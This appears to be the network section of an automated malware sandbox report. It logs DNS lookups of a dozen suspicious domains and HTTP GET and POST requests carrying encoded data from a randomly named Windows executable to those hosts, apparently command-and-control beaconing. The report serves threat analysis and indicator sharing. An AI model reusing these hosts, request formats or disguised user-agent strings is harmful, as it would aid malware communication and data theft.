                                                                                  Dec 12, 2024 00:21:07.194655895 CET5726053192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:21:07.671880007 CET53572601.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:21:22.178101063 CET5485353192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:21:22.504045963 CET53548531.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:22:15.754379034 CET5677453192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:22:16.752842903 CET5677453192.168.2.51.1.1.1
                                                                                  Dec 12, 2024 00:22:16.824521065 CET53567741.1.1.1192.168.2.5
                                                                                  Dec 12, 2024 00:22:16.892524958 CET53567741.1.1.1192.168.2.5

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 12, 2024 00:18:30.029191971 CET192.168.2.51.1.1.10x44baStandard query (0)www.emirates-visa.netA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:18:46.802054882 CET192.168.2.51.1.1.10x5856Standard query (0)www.070001813.xyzA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:01.695694923 CET192.168.2.51.1.1.10x7b00Standard query (0)www.activateya.lifeA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:16.758668900 CET192.168.2.51.1.1.10xaadcStandard query (0)www.walkecode.topA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:32.366599083 CET192.168.2.51.1.1.10x6f6fStandard query (0)www.ciemanr.questA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:47.803029060 CET192.168.2.51.1.1.10x6b8bStandard query (0)www.growbamboo.xyzA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:03.084351063 CET192.168.2.51.1.1.10xe0eStandard query (0)www.primespot.liveA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:18.006520033 CET192.168.2.51.1.1.10x3accStandard query (0)www.hisako.shopA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:19.005263090 CET192.168.2.51.1.1.10x3accStandard query (0)www.hisako.shopA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:34.053006887 CET192.168.2.51.1.1.10x1858Standard query (0)www.rwse6wjx.sbsA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:49.586735010 CET192.168.2.51.1.1.10x6acdStandard query (0)www.17jkgl.comA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:50.596684933 CET192.168.2.51.1.1.10x6acdStandard query (0)www.17jkgl.comA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:51.597526073 CET192.168.2.51.1.1.10x6acdStandard query (0)www.17jkgl.comA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:21:07.194655895 CET192.168.2.51.1.1.10x4b62Standard query (0)www.thezensive.workA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:21:22.178101063 CET192.168.2.51.1.1.10x6416Standard query (0)www.zrichiod-riech.sbsA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:22:15.754379034 CET192.168.2.51.1.1.10x4965Standard query (0)www.wtsshnm.topA (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:22:16.752842903 CET192.168.2.51.1.1.10x4965Standard query (0)www.wtsshnm.topA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 12, 2024 00:18:30.506660938 CET1.1.1.1192.168.2.50x44baNo error (0)www.emirates-visa.netemirates-visa.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:18:30.506660938 CET1.1.1.1192.168.2.50x44baNo error (0)emirates-visa.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:18:30.506660938 CET1.1.1.1192.168.2.50x44baNo error (0)emirates-visa.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:18:47.311109066 CET1.1.1.1192.168.2.50x5856No error (0)www.070001813.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:02.454905987 CET1.1.1.1192.168.2.50x7b00No error (0)www.activateya.lifeactivateya.lifeCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:02.454905987 CET1.1.1.1192.168.2.50x7b00No error (0)activateya.life84.32.84.32A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:17.672605991 CET1.1.1.1192.168.2.50xaadcNo error (0)www.walkecode.top124.71.162.21A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:33.134543896 CET1.1.1.1192.168.2.50x6f6fNo error (0)www.ciemanr.quest2.ciemanr.questCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:33.134543896 CET1.1.1.1192.168.2.50x6f6fNo error (0)2.ciemanr.questa2-1.ciemanr.questCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:33.134543896 CET1.1.1.1192.168.2.50x6f6fNo error (0)a2-1.ciemanr.questa2rukou.jingdong.skinCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:33.134543896 CET1.1.1.1192.168.2.50x6f6fNo error (0)a2rukou.jingdong.skinrk.jingdong.skinCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:33.134543896 CET1.1.1.1192.168.2.50x6f6fNo error (0)rk.jingdong.skin150.109.11.247A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:48.759537935 CET1.1.1.1192.168.2.50x6b8bNo error (0)www.growbamboo.xyzbanajibazar.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:19:48.759537935 CET1.1.1.1192.168.2.50x6b8bNo error (0)banajibazar.xyz173.208.249.155A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:03.625883102 CET1.1.1.1192.168.2.50xe0eNo error (0)www.primespot.live209.74.79.42A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:19.359355927 CET1.1.1.1192.168.2.50x3accNo error (0)www.hisako.shopdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:19.359355927 CET1.1.1.1192.168.2.50x3accNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:19.359355927 CET1.1.1.1192.168.2.50x3accNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:19.359355927 CET1.1.1.1192.168.2.50x3accNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:19.359369040 CET1.1.1.1192.168.2.50x3accNo error (0)www.hisako.shopdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:19.359369040 CET1.1.1.1192.168.2.50x3accNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:19.359369040 CET1.1.1.1192.168.2.50x3accNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:19.359369040 CET1.1.1.1192.168.2.50x3accNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:34.920676947 CET1.1.1.1192.168.2.50x1858No error (0)www.rwse6wjx.sbsb1-3-r11-gmhudx.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:34.920676947 CET1.1.1.1192.168.2.50x1858No error (0)b1-3-r11-gmhudx.t9d2quy5.shopb1-3-r11.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:34.920676947 CET1.1.1.1192.168.2.50x1858No error (0)b1-3-r11.t9d2quy5.shopb1-3-r111-s65psj.8uqm5xgy.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:34.920676947 CET1.1.1.1192.168.2.50x1858No error (0)b1-3-r111-s65psj.8uqm5xgy.shopb1-3-r11-nff52.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:34.920676947 CET1.1.1.1192.168.2.50x1858No error (0)b1-3-r11-nff52.alicloudddos.topb1-3-r111-s65psj.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:34.920676947 CET1.1.1.1192.168.2.50x1858No error (0)b1-3-r111-s65psj.alicloudddos.topb1-3-r111-55g56.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:34.920676947 CET1.1.1.1192.168.2.50x1858No error (0)b1-3-r111-55g56.kunlundns.topb1-3-r111.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:34.920676947 CET1.1.1.1192.168.2.50x1858No error (0)b1-3-r111.kunlundns.top101.32.205.61A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:52.748687029 CET1.1.1.1192.168.2.50x6acdNo error (0)www.17jkgl.com38.6.78.235A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:52.748728991 CET1.1.1.1192.168.2.50x6acdNo error (0)www.17jkgl.com38.6.78.235A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:20:52.748756886 CET1.1.1.1192.168.2.50x6acdNo error (0)www.17jkgl.com38.6.78.235A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:21:07.671880007 CET1.1.1.1192.168.2.50x4b62No error (0)www.thezensive.workthezensive.netlify.appCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 12, 2024 00:21:07.671880007 CET1.1.1.1192.168.2.50x4b62No error (0)thezensive.netlify.app3.125.36.175A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:21:07.671880007 CET1.1.1.1192.168.2.50x4b62No error (0)thezensive.netlify.app3.75.10.80A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:21:22.504045963 CET1.1.1.1192.168.2.50x6416No error (0)www.zrichiod-riech.sbs172.67.176.240A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:21:22.504045963 CET1.1.1.1192.168.2.50x6416No error (0)www.zrichiod-riech.sbs104.21.56.41A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:22:16.824521065 CET1.1.1.1192.168.2.50x4965No error (0)www.wtsshnm.top45.41.80.144A (IP address)IN (0x0001)false
                                                                                  Dec 12, 2024 00:22:16.892524958 CET1.1.1.1192.168.2.50x4965No error (0)www.wtsshnm.top45.41.80.144A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.emirates-visa.net
                                                                                  • www.070001813.xyz
                                                                                  • www.activateya.life
                                                                                  • www.walkecode.top
                                                                                  • www.ciemanr.quest
                                                                                  • www.growbamboo.xyz
                                                                                  • www.primespot.live
                                                                                  • www.hisako.shop
                                                                                  • www.rwse6wjx.sbs
                                                                                  • www.17jkgl.com
                                                                                  • www.thezensive.work
                                                                                  • www.zrichiod-riech.sbs

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.5497403.33.130.190805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:18:30.643790960 CET508OUTGET /5cm4/?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=ZOi5UH6lCHBhnBF9yu7lTl97V2po4KHEvqmaFY3uiUnnM3Kevyv9Tk9tf7brSgBHOaIF9h93DunAghZY9lTBZL9WpirrmBEOY4nZmUaXlywW6LOtEGR1afh1jX/LxafgQA== HTTP/1.1
                                                                                  Host: www.emirates-visa.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:18:31.733844995 CET398INHTTP/1.1 200 OK
                                                                                  content-type: text/html
                                                                                  date: Wed, 11 Dec 2024 23:18:31 GMT
                                                                                  content-length: 277
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 64 4c 68 47 3d 63 4c 43 74 46 6e 71 50 55 76 75 74 54 62 75 50 26 4c 44 56 6c 43 7a 3d 5a 4f 69 35 55 48 36 6c 43 48 42 68 6e 42 46 39 79 75 37 6c 54 6c 39 37 56 32 70 6f 34 4b 48 45 76 71 6d 61 46 59 33 75 69 55 6e 6e 4d 33 4b 65 76 79 76 39 54 6b 39 74 66 37 62 72 53 67 42 48 4f 61 49 46 39 68 39 33 44 75 6e 41 67 68 5a 59 39 6c 54 42 5a 4c 39 57 70 69 72 72 6d 42 45 4f 59 34 6e 5a 6d 55 61 58 6c 79 77 57 36 4c 4f 74 45 47 52 31 61 66 68 31 6a 58 2f 4c 78 61 66 67 51 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NdLhG=cLCtFnqPUvutTbuP&LDVlCz=ZOi5UH6lCHBhnBF9yu7lTl97V2po4KHEvqmaFY3uiUnnM3Kevyv9Tk9tf7brSgBHOaIF9h93DunAghZY9lTBZL9WpirrmBEOY4nZmUaXlywW6LOtEGR1afh1jX/LxafgQA=="}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.549776161.97.142.144805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:18:47.449197054 CET755OUTPOST /gn0y/ HTTP/1.1
                                                                                  Host: www.070001813.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.070001813.xyz
                                                                                  Referer: http://www.070001813.xyz/gn0y/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 51 63 75 62 53 55 61 30 76 6a 7a 6f 4d 2f 72 42 32 2b 6a 31 77 62 58 4d 61 34 32 4d 2f 6a 51 6e 32 61 6d 72 62 49 74 43 62 4e 71 67 39 4f 70 53 66 59 4b 71 50 46 59 46 31 43 2b 77 47 6d 69 6f 4d 30 6f 46 55 38 66 63 6f 7a 56 39 30 5a 58 6c 51 48 64 6e 77 2f 56 62 41 36 46 6c 72 42 77 46 68 41 44 64 66 34 34 56 55 43 42 42 68 31 69 33 35 76 70 31 45 35 47 59 35 49 74 4b 4e 6c 46 77 30 74 6a 36 49 75 39 77 44 55 62 6f 6a 54 72 4e 6e 38 62 51 6b 43 58 36 59 4e 73 70 49 65 4c 61 41 45 58 67 61 54 6a 64 4e 55 7a 75 50 50 51 54 43 4f 4d 68 64 78 75 77 48 44 68 52 42 54 48 57 37 4e 36 65 35 55 63 3d
                                                                                  Data Ascii: LDVlCz=QcubSUa0vjzoM/rB2+j1wbXMa42M/jQn2amrbItCbNqg9OpSfYKqPFYF1C+wGmioM0oFU8fcozV90ZXlQHdnw/VbA6FlrBwFhADdf44VUCBBh1i35vp1E5GY5ItKNlFw0tj6Iu9wDUbojTrNn8bQkCX6YNspIeLaAEXgaTjdNUzuPPQTCOMhdxuwHDhRBTHW7N6e5Uc=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.549782161.97.142.144805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:18:50.110093117 CET775OUTPOST /gn0y/ HTTP/1.1
                                                                                  Host: www.070001813.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.070001813.xyz
                                                                                  Referer: http://www.070001813.xyz/gn0y/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 51 63 75 62 53 55 61 30 76 6a 7a 6f 4e 66 37 42 77 5a 2f 31 68 37 58 50 44 59 32 4d 78 44 51 64 32 61 36 72 62 4a 35 6f 62 37 36 67 39 76 5a 53 65 64 71 71 42 6c 59 46 2f 69 2b 78 5a 32 69 7a 4d 30 31 79 55 2b 4c 63 6f 7a 52 39 30 64 54 6c 51 77 4a 6f 2f 50 56 56 47 36 46 6e 6c 68 77 46 68 41 44 64 66 34 39 77 55 43 5a 42 6d 46 53 33 34 4f 70 32 4f 5a 47 62 2b 49 74 4b 47 46 46 73 30 74 6a 59 49 71 39 65 44 58 6a 6f 6a 52 7a 4e 6d 70 6e 52 78 53 57 78 47 39 73 38 4a 72 6d 32 41 43 58 63 41 77 4f 39 5a 31 76 48 48 5a 68 35 59 73 45 4a 4f 52 43 49 58 51 70 6d 51 6a 6d 2f 68 75 71 75 6e 44 4b 59 4f 47 4b 48 44 6a 6a 54 6f 42 54 52 66 6b 4e 79 48 30 4f 44
                                                                                  Data Ascii: LDVlCz=QcubSUa0vjzoNf7BwZ/1h7XPDY2MxDQd2a6rbJ5ob76g9vZSedqqBlYF/i+xZ2izM01yU+LcozR90dTlQwJo/PVVG6FnlhwFhADdf49wUCZBmFS34Op2OZGb+ItKGFFs0tjYIq9eDXjojRzNmpnRxSWxG9s8Jrm2ACXcAwO9Z1vHHZh5YsEJORCIXQpmQjm/huqunDKYOGKHDjjToBTRfkNyH0OD


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.549789161.97.142.144805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:18:52.778666973 CET1792OUTPOST /gn0y/ HTTP/1.1
                                                                                  Host: www.070001813.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.070001813.xyz
                                                                                  Referer: http://www.070001813.xyz/gn0y/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 51 63 75 62 53 55 61 30 76 6a 7a 6f 4e 66 37 42 77 5a 2f 31 68 37 58 50 44 59 32 4d 78 44 51 64 32 61 36 72 62 4a 35 6f 62 37 79 67 39 39 52 53 63 38 71 71 43 6c 59 46 7a 43 2b 4b 5a 32 6a 72 4d 30 39 32 55 2b 33 4d 6f 78 5a 39 32 34 48 6c 41 46 6c 6f 6f 66 56 56 4c 61 46 6d 72 42 77 51 68 41 54 5a 66 34 74 77 55 43 5a 42 6d 48 4b 33 2f 66 70 32 64 4a 47 59 35 49 74 47 4e 6c 46 51 30 74 37 69 49 71 77 72 44 47 44 6f 6a 78 6a 4e 71 37 50 52 77 79 57 7a 48 39 74 35 4a 72 69 70 41 43 6a 48 41 77 4b 62 5a 79 44 48 45 50 63 77 64 59 42 56 58 68 75 38 54 69 39 78 46 58 57 6e 6c 65 75 5a 6c 51 65 51 4b 6b 61 74 49 48 6a 6c 69 78 61 62 64 6a 4e 63 4d 68 44 74 49 33 54 35 50 6a 79 42 70 44 2f 5a 53 67 34 6d 4e 65 73 44 63 44 35 4c 33 61 6e 4b 2b 36 46 31 79 47 6c 70 48 42 77 39 6b 6e 71 41 54 2b 6b 39 4d 52 56 47 52 34 69 64 51 50 78 7a 4e 56 6c 49 46 33 51 69 2b 79 74 6d 4c 58 78 73 47 4c 55 6d 4d 34 75 46 45 64 42 54 5a 53 6d 4c 54 66 58 57 34 44 51 68 6c 6f 76 44 72 4d 70 73 4b 72 48 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=QcubSUa0vjzoNf7BwZ/1h7XPDY2MxDQd2a6rbJ5ob7yg99RSc8qqClYFzC+KZ2jrM092U+3MoxZ924HlAFloofVVLaFmrBwQhATZf4twUCZBmHK3/fp2dJGY5ItGNlFQ0t7iIqwrDGDojxjNq7PRwyWzH9t5JripACjHAwKbZyDHEPcwdYBVXhu8Ti9xFXWnleuZlQeQKkatIHjlixabdjNcMhDtI3T5PjyBpD/ZSg4mNesDcD5L3anK+6F1yGlpHBw9knqAT+k9MRVGR4idQPxzNVlIF3Qi+ytmLXxsGLUmM4uFEdBTZSmLTfXW4DQhlovDrMpsKrHPxxbNAokPCf2a5FstL7zeQWmOT2ZYeOgHox4fN0gWmGYco+vcnwi3xcNL7N9fDlk0qiiHZxxfRzOxrSguuHxWTVbSQxxYkum0Hd6cddw+NvD5Loc0oPtbHeuaTrMhnFdYFNDSC+Ec/uXKQiS7pYn+JcdEyi1rEUfUtXtJ6YbTggp44mQhube6hMNTnjQF485OdW3lMSWdOglL9O1Ejq54zZ4X+OhY83u8w6RNcPA5aZgEYHrQwzHkTL9QYV3uP5YK6/Yi4uVIAKg6KIQxh6uyyQFohy4Z8QC28LhuWmFWgWSwQE9HaVwAynTMZpbuSJ7AkrHpTD9LSOm2D9n/F1zdFuIjtjmzWHliw9TsSqA04YVkZAsceFsziRHLd+9uTvGznhpqpiCnO8H8/LVt91xUtzWClBCWZVqhqbw9gEeXLHoeYDPEHGanWqTLjjdAp1boxdfSeOw36M8LIr68osMm48sYkVouYOaUFa0SFMU/qmp3yVgkmZxbHggYAk3Jdd5efQUVIrr16Xqetx+pw0naYW8uw+rV3E3sXMNzN3IkL4OmbBzE55cwvT2/bPTvvv48gQZrzsgvx/nLaR895mXxzEkV3zOq7d2gG9ycS5zqpVf2e3vNqMoupsVWS3PZvn1DjGOnKwcI0yycyMx7RviMIqpyaL6LPnJ1t [TRUNCATED]
                                                                                  Dec 12, 2024 00:18:54.046468973 CET1236INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 11 Dec 2024 23:18:53 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: W/"66cce1df-b96"
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                  Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                  Dec 12, 2024 00:18:54.046612024 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                  Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.549795161.97.142.144805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:18:55.433875084 CET504OUTGET /gn0y/?LDVlCz=deG7RjeXnjjKJ6Ot/ZvT1ZCOdrvHxkgph9CMZ5BhYMmF8u0wO9qMaDcK53O3JwyOf3l+Oc7MzAVt2qPkHXgf7ZhvCL0D4R10rxSbaYIqOAV7xlWd89x6BKiu35RrP0Id3g==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.070001813.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:18:56.670917988 CET1236INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 11 Dec 2024 23:18:56 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 2966
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  ETag: "66cce1df-b96"
